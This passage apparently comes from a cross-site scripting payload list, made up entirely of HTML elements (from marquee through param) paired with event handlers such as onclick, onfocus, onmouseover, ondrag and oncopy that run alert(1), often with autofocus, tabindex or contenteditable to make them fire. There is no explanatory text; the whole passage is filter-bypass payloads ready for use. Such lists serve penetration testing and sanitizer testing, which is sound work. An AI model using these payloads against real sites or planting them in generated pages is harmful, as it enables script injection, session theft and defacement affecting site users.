onbeforecut="alert(1)" contenteditable>test</marquee> <marquee onbeforepaste="alert(1)" contenteditable>test</marquee> <marquee onblur=alert(1) tabindex=1 id=x></marquee><input autofocus> <marquee onclick="alert(1)">test</marquee> <marquee oncontextmenu="alert(1)">test</marquee> <marquee oncopy="alert(1)" contenteditable>test</marquee> <marquee oncut="alert(1)" contenteditable>test</marquee> <marquee ondblclick="alert(1)">test</marquee> <marquee onfocusout=alert(1) tabindex=1 id=x></marquee><input autofocus> <marquee onkeydown="alert(1)" contenteditable>test</marquee> <marquee onkeypress="alert(1)" contenteditable>test</marquee> <marquee onkeyup="alert(1)" contenteditable>test</marquee> <marquee onmousedown="alert(1)">test</marquee> <marquee onmouseenter="alert(1)">test</marquee> <marquee onmouseleave="alert(1)">test</marquee> <marquee onmousemove="alert(1)">test</marquee> <marquee onmouseout="alert(1)">test</marquee> <marquee onmouseover="alert(1)">test</marquee> <marquee onmouseup="alert(1)">test</marquee> <marquee onpaste="alert(1)" contenteditable>test</marquee> <marquee onstart=alert(1)>XSS</marquee> <marquee width=1 loop=1 onbounce=alert(1)>XSS</marquee> <marquee width=1 loop=1 onfinish=alert(1)>XSS</marquee> <menu draggable="true" ondrag="alert(1)">test</menu> <menu draggable="true" ondragend="alert(1)">test</menu> <menu draggable="true" ondragenter="alert(1)">test</menu> <menu draggable="true" ondragleave="alert(1)">test</menu> <menu draggable="true" ondragstart="alert(1)">test</menu> <menu id=x tabindex=1 onactivate=alert(1)></menu> <menu id=x tabindex=1 onbeforeactivate=alert(1)></menu> <menu id=x tabindex=1 onbeforedeactivate=alert(1)></menu><input autofocus> <menu id=x tabindex=1 ondeactivate=alert(1)></menu><input id=y autofocus> <menu id=x tabindex=1 onfocus=alert(1)></menu> <menu id=x tabindex=1 onfocusin=alert(1)></menu> <menu onbeforecopy="alert(1)" contenteditable>test</menu> <menu onbeforecut="alert(1)" contenteditable>test</menu> <menu onbeforepaste="alert(1)" contenteditable>test</menu> <menu onblur=alert(1) tabindex=1 id=x></menu><input autofocus> <menu onclick="alert(1)">test</menu> <menu oncontextmenu="alert(1)">test</menu> <menu oncopy="alert(1)" contenteditable>test</menu> <menu oncut="alert(1)" contenteditable>test</menu> <menu ondblclick="alert(1)">test</menu> <menu onfocusout=alert(1) tabindex=1 id=x></menu><input autofocus> <menu onkeydown="alert(1)" contenteditable>test</menu> <menu onkeypress="alert(1)" contenteditable>test</menu> <menu onkeyup="alert(1)" contenteditable>test</menu> <menu onmousedown="alert(1)">test</menu> <menu onmouseenter="alert(1)">test</menu> <menu onmouseleave="alert(1)">test</menu> <menu onmousemove="alert(1)">test</menu> <menu onmouseout="alert(1)">test</menu> <menu onmouseover="alert(1)">test</menu> <menu onmouseup="alert(1)">test</menu> <menu onpaste="alert(1)" contenteditable>test</menu> <menuitem draggable="true" ondrag="alert(1)">test</menuitem> <menuitem draggable="true" ondragend="alert(1)">test</menuitem> <menuitem draggable="true" ondragenter="alert(1)">test</menuitem> <menuitem draggable="true" ondragleave="alert(1)">test</menuitem> <menuitem draggable="true" ondragstart="alert(1)">test</menuitem> <menuitem id=x tabindex=1 onactivate=alert(1)></menuitem> <menuitem id=x tabindex=1 onbeforeactivate=alert(1)></menuitem> <menuitem id=x tabindex=1 onbeforedeactivate=alert(1)></menuitem><input autofocus> <menuitem id=x tabindex=1 ondeactivate=alert(1)></menuitem><input id=y autofocus> <menuitem id=x tabindex=1 onfocus=alert(1)></menuitem> <menuitem id=x tabindex=1 onfocusin=alert(1)></menuitem> <menuitem onbeforecopy="alert(1)" contenteditable>test</menuitem> <menuitem onbeforecut="alert(1)" contenteditable>test</menuitem> <menuitem onbeforepaste="alert(1)" contenteditable>test</menuitem> <menuitem onblur=alert(1) tabindex=1 id=x></menuitem><input autofocus> <menuitem onclick="alert(1)">test</menuitem> <menuitem oncontextmenu="alert(1)">test</menuitem> <menuitem oncopy="alert(1)" contenteditable>test</menuitem> <menuitem oncut="alert(1)" contenteditable>test</menuitem> <menuitem ondblclick="alert(1)">test</menuitem> <menuitem onfocusout=alert(1) tabindex=1 id=x></menuitem><input autofocus> <menuitem onkeydown="alert(1)" contenteditable>test</menuitem> <menuitem onkeypress="alert(1)" contenteditable>test</menuitem> <menuitem onkeyup="alert(1)" contenteditable>test</menuitem> <menuitem onmousedown="alert(1)">test</menuitem> <menuitem onmouseenter="alert(1)">test</menuitem> <menuitem onmouseleave="alert(1)">test</menuitem> <menuitem onmousemove="alert(1)">test</menuitem> <menuitem onmouseout="alert(1)">test</menuitem> <menuitem onmouseover="alert(1)">test</menuitem> <menuitem onmouseup="alert(1)">test</menuitem> <menuitem onpaste="alert(1)" contenteditable>test</menuitem> <meta draggable="true" ondrag="alert(1)">test</meta> <meta draggable="true" ondragend="alert(1)">test</meta> <meta draggable="true" ondragenter="alert(1)">test</meta> <meta draggable="true" ondragleave="alert(1)">test</meta> <meta draggable="true" ondragstart="alert(1)">test</meta> <meta id=x tabindex=1 onactivate=alert(1)></meta> <meta id=x tabindex=1 onbeforeactivate=alert(1)></meta> <meta id=x tabindex=1 onbeforedeactivate=alert(1)></meta><input autofocus> <meta id=x tabindex=1 ondeactivate=alert(1)></meta><input id=y autofocus> <meta id=x tabindex=1 onfocus=alert(1)></meta> <meta id=x tabindex=1 onfocusin=alert(1)></meta> <meta onbeforecopy="alert(1)" contenteditable>test</meta> <meta onbeforecut="alert(1)" contenteditable>test</meta> <meta onbeforepaste="alert(1)" contenteditable>test</meta> <meta onblur=alert(1) tabindex=1 id=x></meta><input autofocus> <meta onclick="alert(1)">test</meta> <meta oncontextmenu="alert(1)">test</meta> <meta oncopy="alert(1)" contenteditable>test</meta> <meta oncut="alert(1)" contenteditable>test</meta> <meta ondblclick="alert(1)">test</meta> <meta onfocusout=alert(1) tabindex=1 id=x></meta><input autofocus> <meta onkeydown="alert(1)" contenteditable>test</meta> <meta onkeypress="alert(1)" contenteditable>test</meta> <meta onkeyup="alert(1)" contenteditable>test</meta> <meta onmousedown="alert(1)">test</meta> <meta onmouseenter="alert(1)">test</meta> <meta onmouseleave="alert(1)">test</meta> <meta onmousemove="alert(1)">test</meta> <meta onmouseout="alert(1)">test</meta> <meta onmouseover="alert(1)">test</meta> <meta onmouseup="alert(1)">test</meta> <meta onpaste="alert(1)" contenteditable>test</meta> <meter draggable="true" ondrag="alert(1)">test</meter> <meter draggable="true" ondragend="alert(1)">test</meter> <meter draggable="true" ondragenter="alert(1)">test</meter> <meter draggable="true" ondragleave="alert(1)">test</meter> <meter draggable="true" ondragstart="alert(1)">test</meter> <meter id=x tabindex=1 onactivate=alert(1)></meter> <meter id=x tabindex=1 onbeforeactivate=alert(1)></meter> <meter id=x tabindex=1 onbeforedeactivate=alert(1)></meter><input autofocus> <meter id=x tabindex=1 ondeactivate=alert(1)></meter><input id=y autofocus> <meter id=x tabindex=1 onfocus=alert(1)></meter> <meter id=x tabindex=1 onfocusin=alert(1)></meter> <meter onbeforecopy="alert(1)" contenteditable>test</meter> <meter onbeforecut="alert(1)" contenteditable>test</meter> <meter onbeforepaste="alert(1)" contenteditable>test</meter> <meter onblur=alert(1) tabindex=1 id=x></meter><input autofocus> <meter onclick="alert(1)">test</meter> <meter oncontextmenu="alert(1)">test</meter> <meter oncopy="alert(1)" contenteditable>test</meter> <meter oncut="alert(1)" contenteditable>test</meter> <meter ondblclick="alert(1)">test</meter> <meter onfocusout=alert(1) tabindex=1 id=x></meter><input autofocus> <meter onkeydown="alert(1)" contenteditable>test</meter> <meter onkeypress="alert(1)" contenteditable>test</meter> <meter onkeyup="alert(1)" contenteditable>test</meter> <meter onmousedown="alert(1)">test</meter> <meter onmouseenter="alert(1)">test</meter> <meter onmouseleave="alert(1)">test</meter> <meter onmousemove="alert(1)">test</meter> <meter onmouseout="alert(1)">test</meter> <meter onmouseover="alert(1)">test</meter> <meter onmouseup="alert(1)">test</meter> <meter onpaste="alert(1)" contenteditable>test</meter> <multicol draggable="true" ondrag="alert(1)">test</multicol> <multicol draggable="true" ondragend="alert(1)">test</multicol> <multicol draggable="true" ondragenter="alert(1)">test</multicol> <multicol draggable="true" ondragleave="alert(1)">test</multicol> <multicol draggable="true" ondragstart="alert(1)">test</multicol> <multicol id=x tabindex=1 onactivate=alert(1)></multicol> <multicol id=x tabindex=1 onbeforeactivate=alert(1)></multicol> <multicol id=x tabindex=1 onbeforedeactivate=alert(1)></multicol><input autofocus> <multicol id=x tabindex=1 ondeactivate=alert(1)></multicol><input id=y autofocus> <multicol id=x tabindex=1 onfocus=alert(1)></multicol> <multicol id=x tabindex=1 onfocusin=alert(1)></multicol> <multicol onbeforecopy="alert(1)" contenteditable>test</multicol> <multicol onbeforecut="alert(1)" contenteditable>test</multicol> <multicol onbeforepaste="alert(1)" contenteditable>test</multicol> <multicol onblur=alert(1) tabindex=1 id=x></multicol><input autofocus> <multicol onclick="alert(1)">test</multicol> <multicol oncontextmenu="alert(1)">test</multicol> <multicol oncopy="alert(1)" contenteditable>test</multicol> <multicol oncut="alert(1)" contenteditable>test</multicol> <multicol ondblclick="alert(1)">test</multicol> <multicol onfocusout=alert(1) tabindex=1 id=x></multicol><input autofocus> <multicol onkeydown="alert(1)" contenteditable>test</multicol> <multicol onkeypress="alert(1)" contenteditable>test</multicol> <multicol onkeyup="alert(1)" contenteditable>test</multicol> <multicol onmousedown="alert(1)">test</multicol> <multicol onmouseenter="alert(1)">test</multicol> <multicol onmouseleave="alert(1)">test</multicol> <multicol onmousemove="alert(1)">test</multicol> <multicol onmouseout="alert(1)">test</multicol> <multicol onmouseover="alert(1)">test</multicol> <multicol onmouseup="alert(1)">test</multicol> <multicol onpaste="alert(1)" contenteditable>test</multicol> <nav draggable="true" ondrag="alert(1)">test</nav> <nav draggable="true" ondragend="alert(1)">test</nav> <nav draggable="true" ondragenter="alert(1)">test</nav> <nav draggable="true" ondragleave="alert(1)">test</nav> <nav draggable="true" ondragstart="alert(1)">test</nav> <nav id=x tabindex=1 onactivate=alert(1)></nav> <nav id=x tabindex=1 onbeforeactivate=alert(1)></nav> <nav id=x tabindex=1 onbeforedeactivate=alert(1)></nav><input autofocus> <nav id=x tabindex=1 ondeactivate=alert(1)></nav><input id=y autofocus> <nav id=x tabindex=1 onfocus=alert(1)></nav> <nav id=x tabindex=1 onfocusin=alert(1)></nav> <nav onbeforecopy="alert(1)" contenteditable>test</nav> <nav onbeforecut="alert(1)" contenteditable>test</nav> <nav onbeforepaste="alert(1)" contenteditable>test</nav> <nav onblur=alert(1) tabindex=1 id=x></nav><input autofocus> <nav onclick="alert(1)">test</nav> <nav oncontextmenu="alert(1)">test</nav> <nav oncopy="alert(1)" contenteditable>test</nav> <nav oncut="alert(1)" contenteditable>test</nav> <nav ondblclick="alert(1)">test</nav> <nav onfocusout=alert(1) tabindex=1 id=x></nav><input autofocus> <nav onkeydown="alert(1)" contenteditable>test</nav> <nav onkeypress="alert(1)" contenteditable>test</nav> <nav onkeyup="alert(1)" contenteditable>test</nav> <nav onmousedown="alert(1)">test</nav> <nav onmouseenter="alert(1)">test</nav> <nav onmouseleave="alert(1)">test</nav> <nav onmousemove="alert(1)">test</nav> <nav onmouseout="alert(1)">test</nav> <nav onmouseover="alert(1)">test</nav> <nav onmouseup="alert(1)">test</nav> <nav onpaste="alert(1)" contenteditable>test</nav> <nextid draggable="true" ondrag="alert(1)">test</nextid> <nextid draggable="true" ondragend="alert(1)">test</nextid> <nextid draggable="true" ondragenter="alert(1)">test</nextid> <nextid draggable="true" ondragleave="alert(1)">test</nextid> <nextid draggable="true" ondragstart="alert(1)">test</nextid> <nextid id=x tabindex=1 onactivate=alert(1)></nextid> <nextid id=x tabindex=1 onbeforeactivate=alert(1)></nextid> <nextid id=x tabindex=1 onbeforedeactivate=alert(1)></nextid><input autofocus> <nextid id=x tabindex=1 ondeactivate=alert(1)></nextid><input id=y autofocus> <nextid id=x tabindex=1 onfocus=alert(1)></nextid> <nextid id=x tabindex=1 onfocusin=alert(1)></nextid> <nextid onbeforecopy="alert(1)" contenteditable>test</nextid> <nextid onbeforecut="alert(1)" contenteditable>test</nextid> <nextid onbeforepaste="alert(1)" contenteditable>test</nextid> <nextid onblur=alert(1) tabindex=1 id=x></nextid><input autofocus> <nextid onclick="alert(1)">test</nextid> <nextid oncontextmenu="alert(1)">test</nextid> <nextid oncopy="alert(1)" contenteditable>test</nextid> <nextid oncut="alert(1)" contenteditable>test</nextid> <nextid ondblclick="alert(1)">test</nextid> <nextid onfocusout=alert(1) tabindex=1 id=x></nextid><input autofocus> <nextid onkeydown="alert(1)" contenteditable>test</nextid> <nextid onkeypress="alert(1)" contenteditable>test</nextid> <nextid onkeyup="alert(1)" contenteditable>test</nextid> <nextid onmousedown="alert(1)">test</nextid> <nextid onmouseenter="alert(1)">test</nextid> <nextid onmouseleave="alert(1)">test</nextid> <nextid onmousemove="alert(1)">test</nextid> <nextid onmouseout="alert(1)">test</nextid> <nextid onmouseover="alert(1)">test</nextid> <nextid onmouseup="alert(1)">test</nextid> <nextid onpaste="alert(1)" contenteditable>test</nextid> <nobr draggable="true" ondrag="alert(1)">test</nobr> <nobr draggable="true" ondragend="alert(1)">test</nobr> <nobr draggable="true" ondragenter="alert(1)">test</nobr> <nobr draggable="true" ondragleave="alert(1)">test</nobr> <nobr draggable="true" ondragstart="alert(1)">test</nobr> <nobr id=x tabindex=1 onactivate=alert(1)></nobr> <nobr id=x tabindex=1 onbeforeactivate=alert(1)></nobr> <nobr id=x tabindex=1 onbeforedeactivate=alert(1)></nobr><input autofocus> <nobr id=x tabindex=1 ondeactivate=alert(1)></nobr><input id=y autofocus> <nobr id=x tabindex=1 onfocus=alert(1)></nobr> <nobr id=x tabindex=1 onfocusin=alert(1)></nobr> <nobr onbeforecopy="alert(1)" contenteditable>test</nobr> <nobr onbeforecut="alert(1)" contenteditable>test</nobr> <nobr onbeforepaste="alert(1)" contenteditable>test</nobr> <nobr onblur=alert(1) tabindex=1 id=x></nobr><input autofocus> <nobr onclick="alert(1)">test</nobr> <nobr oncontextmenu="alert(1)">test</nobr> <nobr oncopy="alert(1)" contenteditable>test</nobr> <nobr oncut="alert(1)" contenteditable>test</nobr> <nobr ondblclick="alert(1)">test</nobr> <nobr onfocusout=alert(1) tabindex=1 id=x></nobr><input autofocus> <nobr onkeydown="alert(1)" contenteditable>test</nobr> <nobr onkeypress="alert(1)" contenteditable>test</nobr> <nobr onkeyup="alert(1)" contenteditable>test</nobr> <nobr onmousedown="alert(1)">test</nobr> <nobr onmouseenter="alert(1)">test</nobr> <nobr onmouseleave="alert(1)">test</nobr> <nobr onmousemove="alert(1)">test</nobr> <nobr onmouseout="alert(1)">test</nobr> <nobr onmouseover="alert(1)">test</nobr> <nobr onmouseup="alert(1)">test</nobr> <nobr onpaste="alert(1)" contenteditable>test</nobr> <noembed draggable="true" ondrag="alert(1)">test</noembed> <noembed draggable="true" ondragend="alert(1)">test</noembed> <noembed draggable="true" ondragenter="alert(1)">test</noembed> <noembed draggable="true" ondragleave="alert(1)">test</noembed> <noembed draggable="true" ondragstart="alert(1)">test</noembed> <noembed id=x tabindex=1 onactivate=alert(1)></noembed> <noembed id=x tabindex=1 onbeforeactivate=alert(1)></noembed> <noembed id=x tabindex=1 onbeforedeactivate=alert(1)></noembed><input autofocus> <noembed id=x tabindex=1 ondeactivate=alert(1)></noembed><input id=y autofocus> <noembed id=x tabindex=1 onfocus=alert(1)></noembed> <noembed id=x tabindex=1 onfocusin=alert(1)></noembed> <noembed onbeforecopy="alert(1)" contenteditable>test</noembed> <noembed onbeforecut="alert(1)" contenteditable>test</noembed> <noembed onbeforepaste="alert(1)" contenteditable>test</noembed> <noembed onblur=alert(1) tabindex=1 id=x></noembed><input autofocus> <noembed onclick="alert(1)">test</noembed> <noembed oncontextmenu="alert(1)">test</noembed> <noembed oncopy="alert(1)" contenteditable>test</noembed> <noembed oncut="alert(1)" contenteditable>test</noembed> <noembed ondblclick="alert(1)">test</noembed> <noembed onfocusout=alert(1) tabindex=1 id=x></noembed><input autofocus> <noembed onkeydown="alert(1)" contenteditable>test</noembed> <noembed onkeypress="alert(1)" contenteditable>test</noembed> <noembed onkeyup="alert(1)" contenteditable>test</noembed> <noembed onmousedown="alert(1)">test</noembed> <noembed onmouseenter="alert(1)">test</noembed> <noembed onmouseleave="alert(1)">test</noembed> <noembed onmousemove="alert(1)">test</noembed> <noembed onmouseout="alert(1)">test</noembed> <noembed onmouseover="alert(1)">test</noembed> <noembed onmouseup="alert(1)">test</noembed> <noembed onpaste="alert(1)" contenteditable>test</noembed> <noframes draggable="true" ondrag="alert(1)">test</noframes> <noframes draggable="true" ondragend="alert(1)">test</noframes> <noframes draggable="true" ondragenter="alert(1)">test</noframes> <noframes draggable="true" ondragleave="alert(1)">test</noframes> <noframes draggable="true" ondragstart="alert(1)">test</noframes> <noframes id=x tabindex=1 onactivate=alert(1)></noframes> <noframes id=x tabindex=1 onbeforeactivate=alert(1)></noframes> <noframes id=x tabindex=1 onbeforedeactivate=alert(1)></noframes><input autofocus> <noframes id=x tabindex=1 ondeactivate=alert(1)></noframes><input id=y autofocus> <noframes id=x tabindex=1 onfocus=alert(1)></noframes> <noframes id=x tabindex=1 onfocusin=alert(1)></noframes> <noframes onbeforecopy="alert(1)" contenteditable>test</noframes> <noframes onbeforecut="alert(1)" contenteditable>test</noframes> <noframes onbeforepaste="alert(1)" contenteditable>test</noframes> <noframes onblur=alert(1) tabindex=1 id=x></noframes><input autofocus> <noframes onclick="alert(1)">test</noframes> <noframes oncontextmenu="alert(1)">test</noframes> <noframes oncopy="alert(1)" contenteditable>test</noframes> <noframes oncut="alert(1)" contenteditable>test</noframes> <noframes ondblclick="alert(1)">test</noframes> <noframes onfocusout=alert(1) tabindex=1 id=x></noframes><input autofocus> <noframes onkeydown="alert(1)" contenteditable>test</noframes> <noframes onkeypress="alert(1)" contenteditable>test</noframes> <noframes onkeyup="alert(1)" contenteditable>test</noframes> <noframes onmousedown="alert(1)">test</noframes> <noframes onmouseenter="alert(1)">test</noframes> <noframes onmouseleave="alert(1)">test</noframes> <noframes onmousemove="alert(1)">test</noframes> <noframes onmouseout="alert(1)">test</noframes> <noframes onmouseover="alert(1)">test</noframes> <noframes onmouseup="alert(1)">test</noframes> <noframes onpaste="alert(1)" contenteditable>test</noframes> <noscript draggable="true" ondrag="alert(1)">test</noscript> <noscript draggable="true" ondragend="alert(1)">test</noscript> <noscript draggable="true" ondragenter="alert(1)">test</noscript> <noscript draggable="true" ondragleave="alert(1)">test</noscript> <noscript draggable="true" ondragstart="alert(1)">test</noscript> <noscript id=x tabindex=1 onactivate=alert(1)></noscript> <noscript id=x tabindex=1 onbeforeactivate=alert(1)></noscript> <noscript id=x tabindex=1 onbeforedeactivate=alert(1)></noscript><input autofocus> <noscript id=x tabindex=1 ondeactivate=alert(1)></noscript><input id=y autofocus> <noscript id=x tabindex=1 onfocus=alert(1)></noscript> <noscript id=x tabindex=1 onfocusin=alert(1)></noscript> <noscript onbeforecopy="alert(1)" contenteditable>test</noscript> <noscript onbeforecut="alert(1)" contenteditable>test</noscript> <noscript onbeforepaste="alert(1)" contenteditable>test</noscript> <noscript onblur=alert(1) tabindex=1 id=x></noscript><input autofocus> <noscript onclick="alert(1)">test</noscript> <noscript oncontextmenu="alert(1)">test</noscript> <noscript oncopy="alert(1)" contenteditable>test</noscript> <noscript oncut="alert(1)" contenteditable>test</noscript> <noscript ondblclick="alert(1)">test</noscript> <noscript onfocusout=alert(1) tabindex=1 id=x></noscript><input autofocus> <noscript onkeydown="alert(1)" contenteditable>test</noscript> <noscript onkeypress="alert(1)" contenteditable>test</noscript> <noscript onkeyup="alert(1)" contenteditable>test</noscript> <noscript onmousedown="alert(1)">test</noscript> <noscript onmouseenter="alert(1)">test</noscript> <noscript onmouseleave="alert(1)">test</noscript> <noscript onmousemove="alert(1)">test</noscript> <noscript onmouseout="alert(1)">test</noscript> <noscript onmouseover="alert(1)">test</noscript> <noscript onmouseup="alert(1)">test</noscript> <noscript onpaste="alert(1)" contenteditable>test</noscript> <object data=/ onload=alert(1)> <object data=/ onreadystatechange=alert(1)> <object draggable="true" ondrag="alert(1)">test</object> <object draggable="true" ondragend="alert(1)">test</object> <object draggable="true" ondragenter="alert(1)">test</object> <object draggable="true" ondragleave="alert(1)">test</object> <object draggable="true" ondragstart="alert(1)">test</object> <object id=x onfocus=alert(1) type=text/html> <object id=x onfocusin=alert(1) type=text/html> <object id=x tabindex=1 onactivate=alert(1)></object> <object id=x tabindex=1 onbeforeactivate=alert(1)></object> <object id=x tabindex=1 onbeforedeactivate=alert(1)></object><input autofocus> <object id=x tabindex=1 ondeactivate=alert(1)></object><input id=y autofocus> <object onbeforecopy="alert(1)" contenteditable>test</object> <object onbeforecut="alert(1)" contenteditable>test</object> <object onbeforepaste="alert(1)" contenteditable>test</object> <object onblur=alert(1) tabindex=1 id=x></object><input autofocus> <object onclick="alert(1)">test</object> <object oncontextmenu="alert(1)">test</object> <object oncopy="alert(1)" contenteditable>test</object> <object oncut="alert(1)" contenteditable>test</object> <object ondblclick="alert(1)">test</object> <object onerror=alert(1) data=1 type=image/gif> <object onfocusout=alert(1) tabindex=1 id=x></object><input autofocus> <object onkeydown="alert(1)" contenteditable>test</object> <object onkeypress="alert(1)" contenteditable>test</object> <object onkeyup="alert(1)" contenteditable>test</object> <object onmousedown="alert(1)">test</object> <object onmouseenter="alert(1)">test</object> <object onmouseleave="alert(1)">test</object> <object onmousemove="alert(1)">test</object> <object onmouseout="alert(1)">test</object> <object onmouseover="alert(1)">test</object> <object onmouseup="alert(1)">test</object> <object onpaste="alert(1)" contenteditable>test</object> <ol draggable="true" ondrag="alert(1)">test</ol> <ol draggable="true" ondragend="alert(1)">test</ol> <ol draggable="true" ondragenter="alert(1)">test</ol> <ol draggable="true" ondragleave="alert(1)">test</ol> <ol draggable="true" ondragstart="alert(1)">test</ol> <ol id=x tabindex=1 onactivate=alert(1)></ol> <ol id=x tabindex=1 onbeforeactivate=alert(1)></ol> <ol id=x tabindex=1 onbeforedeactivate=alert(1)></ol><input autofocus> <ol id=x tabindex=1 ondeactivate=alert(1)></ol><input id=y autofocus> <ol id=x tabindex=1 onfocus=alert(1)></ol> <ol id=x tabindex=1 onfocusin=alert(1)></ol> <ol onbeforecopy="alert(1)" contenteditable>test</ol> <ol onbeforecut="alert(1)" contenteditable>test</ol> <ol onbeforepaste="alert(1)" contenteditable>test</ol> <ol onblur=alert(1) tabindex=1 id=x></ol><input autofocus> <ol onclick="alert(1)">test</ol> <ol oncontextmenu="alert(1)">test</ol> <ol oncopy="alert(1)" contenteditable>test</ol> <ol oncut="alert(1)" contenteditable>test</ol> <ol ondblclick="alert(1)">test</ol> <ol onfocusout=alert(1) tabindex=1 id=x></ol><input autofocus> <ol onkeydown="alert(1)" contenteditable>test</ol> <ol onkeypress="alert(1)" contenteditable>test</ol> <ol onkeyup="alert(1)" contenteditable>test</ol> <ol onmousedown="alert(1)">test</ol> <ol onmouseenter="alert(1)">test</ol> <ol onmouseleave="alert(1)">test</ol> <ol onmousemove="alert(1)">test</ol> <ol onmouseout="alert(1)">test</ol> <ol onmouseover="alert(1)">test</ol> <ol onmouseup="alert(1)">test</ol> <ol onpaste="alert(1)" contenteditable>test</ol> <optgroup draggable="true" ondrag="alert(1)">test</optgroup> <optgroup draggable="true" ondragend="alert(1)">test</optgroup> <optgroup draggable="true" ondragenter="alert(1)">test</optgroup> <optgroup draggable="true" ondragleave="alert(1)">test</optgroup> <optgroup draggable="true" ondragstart="alert(1)">test</optgroup> <optgroup id=x tabindex=1 onactivate=alert(1)></optgroup> <optgroup id=x tabindex=1 onbeforeactivate=alert(1)></optgroup> <optgroup id=x tabindex=1 onbeforedeactivate=alert(1)></optgroup><input autofocus> <optgroup id=x tabindex=1 ondeactivate=alert(1)></optgroup><input id=y autofocus> <optgroup id=x tabindex=1 onfocus=alert(1)></optgroup> <optgroup id=x tabindex=1 onfocusin=alert(1)></optgroup> <optgroup onbeforecopy="alert(1)" contenteditable>test</optgroup> <optgroup onbeforecut="alert(1)" contenteditable>test</optgroup> <optgroup onbeforepaste="alert(1)" contenteditable>test</optgroup> <optgroup onblur=alert(1) tabindex=1 id=x></optgroup><input autofocus> <optgroup onclick="alert(1)">test</optgroup> <optgroup oncontextmenu="alert(1)">test</optgroup> <optgroup oncopy="alert(1)" contenteditable>test</optgroup> <optgroup oncut="alert(1)" contenteditable>test</optgroup> <optgroup ondblclick="alert(1)">test</optgroup> <optgroup onfocusout=alert(1) tabindex=1 id=x></optgroup><input autofocus> <optgroup onkeydown="alert(1)" contenteditable>test</optgroup> <optgroup onkeypress="alert(1)" contenteditable>test</optgroup> <optgroup onkeyup="alert(1)" contenteditable>test</optgroup> <optgroup onmousedown="alert(1)">test</optgroup> <optgroup onmouseenter="alert(1)">test</optgroup> <optgroup onmouseleave="alert(1)">test</optgroup> <optgroup onmousemove="alert(1)">test</optgroup> <optgroup onmouseout="alert(1)">test</optgroup> <optgroup onmouseover="alert(1)">test</optgroup> <optgroup onmouseup="alert(1)">test</optgroup> <optgroup onpaste="alert(1)" contenteditable>test</optgroup> <option draggable="true" ondrag="alert(1)">test</option> <option draggable="true" ondragend="alert(1)">test</option> <option draggable="true" ondragenter="alert(1)">test</option> <option draggable="true" ondragleave="alert(1)">test</option> <option draggable="true" ondragstart="alert(1)">test</option> <option id=x tabindex=1 onactivate=alert(1)></option> <option id=x tabindex=1 onbeforeactivate=alert(1)></option> <option id=x tabindex=1 onbeforedeactivate=alert(1)></option><input autofocus> <option id=x tabindex=1 ondeactivate=alert(1)></option><input id=y autofocus> <option id=x tabindex=1 onfocus=alert(1)></option> <option id=x tabindex=1 onfocusin=alert(1)></option> <option onbeforecopy="alert(1)" contenteditable>test</option> <option onbeforecut="alert(1)" contenteditable>test</option> <option onbeforepaste="alert(1)" contenteditable>test</option> <option onblur=alert(1) tabindex=1 id=x></option><input autofocus> <option onclick="alert(1)">test</option> <option oncontextmenu="alert(1)">test</option> <option oncopy="alert(1)" contenteditable>test</option> <option oncut="alert(1)" contenteditable>test</option> <option ondblclick="alert(1)">test</option> <option onfocusout=alert(1) tabindex=1 id=x></option><input autofocus> <option onkeydown="alert(1)" contenteditable>test</option> <option onkeypress="alert(1)" contenteditable>test</option> <option onkeyup="alert(1)" contenteditable>test</option> <option onmousedown="alert(1)">test</option> <option onmouseenter="alert(1)">test</option> <option onmouseleave="alert(1)">test</option> <option onmousemove="alert(1)">test</option> <option onmouseout="alert(1)">test</option> <option onmouseover="alert(1)">test</option> <option onmouseup="alert(1)">test</option> <option onpaste="alert(1)" contenteditable>test</option> <output draggable="true" ondrag="alert(1)">test</output> <output draggable="true" ondragend="alert(1)">test</output> <output draggable="true" ondragenter="alert(1)">test</output> <output draggable="true" ondragleave="alert(1)">test</output> <output draggable="true" ondragstart="alert(1)">test</output> <output id=x tabindex=1 onactivate=alert(1)></output> <output id=x tabindex=1 onbeforeactivate=alert(1)></output> <output id=x tabindex=1 onbeforedeactivate=alert(1)></output><input autofocus> <output id=x tabindex=1 ondeactivate=alert(1)></output><input id=y autofocus> <output id=x tabindex=1 onfocus=alert(1)></output> <output id=x tabindex=1 onfocusin=alert(1)></output> <output onbeforecopy="alert(1)" contenteditable>test</output> <output onbeforecut="alert(1)" contenteditable>test</output> <output onbeforepaste="alert(1)" contenteditable>test</output> <output onblur=alert(1) tabindex=1 id=x></output><input autofocus> <output onclick="alert(1)">test</output> <output oncontextmenu="alert(1)">test</output> <output oncopy="alert(1)" contenteditable>test</output> <output oncut="alert(1)" contenteditable>test</output> <output ondblclick="alert(1)">test</output> <output onfocusout=alert(1) tabindex=1 id=x></output><input autofocus> <output onkeydown="alert(1)" contenteditable>test</output> <output onkeypress="alert(1)" contenteditable>test</output> <output onkeyup="alert(1)" contenteditable>test</output> <output onmousedown="alert(1)">test</output> <output onmouseenter="alert(1)">test</output> <output onmouseleave="alert(1)">test</output> <output onmousemove="alert(1)">test</output> <output onmouseout="alert(1)">test</output> <output onmouseover="alert(1)">test</output> <output onmouseup="alert(1)">test</output> <output onpaste="alert(1)" contenteditable>test</output> <p draggable="true" ondrag="alert(1)">test</p> <p draggable="true" ondragend="alert(1)">test</p> <p draggable="true" ondragenter="alert(1)">test</p> <p draggable="true" ondragleave="alert(1)">test</p> <p draggable="true" ondragstart="alert(1)">test</p> <p id=x tabindex=1 onactivate=alert(1)></p> <p id=x tabindex=1 onbeforeactivate=alert(1)></p> <p id=x tabindex=1 onbeforedeactivate=alert(1)></p><input autofocus> <p id=x tabindex=1 ondeactivate=alert(1)></p><input id=y autofocus> <p id=x tabindex=1 onfocus=alert(1)></p> <p id=x tabindex=1 onfocusin=alert(1)></p> <p onbeforecopy="alert(1)" contenteditable>test</p> <p onbeforecut="alert(1)" contenteditable>test</p> <p onbeforepaste="alert(1)" contenteditable>test</p> <p onblur=alert(1) tabindex=1 id=x></p><input autofocus> <p onclick="alert(1)">test</p> <p oncontextmenu="alert(1)">test</p> <p oncopy="alert(1)" contenteditable>test</p> <p oncut="alert(1)" contenteditable>test</p> <p ondblclick="alert(1)">test</p> <p onfocusout=alert(1) tabindex=1 id=x></p><input autofocus> <p onkeydown="alert(1)" contenteditable>test</p> <p onkeypress="alert(1)" contenteditable>test</p> <p onkeyup="alert(1)" contenteditable>test</p> <p onmousedown="alert(1)">test</p> <p onmouseenter="alert(1)">test</p> <p onmouseleave="alert(1)">test</p> <p onmousemove="alert(1)">test</p> <p onmouseout="alert(1)">test</p> <p onmouseover="alert(1)">test</p> <p onmouseup="alert(1)">test</p> <p onpaste="alert(1)" contenteditable>test</p> <param draggable="true" ondrag="alert(1)">test</param> <param 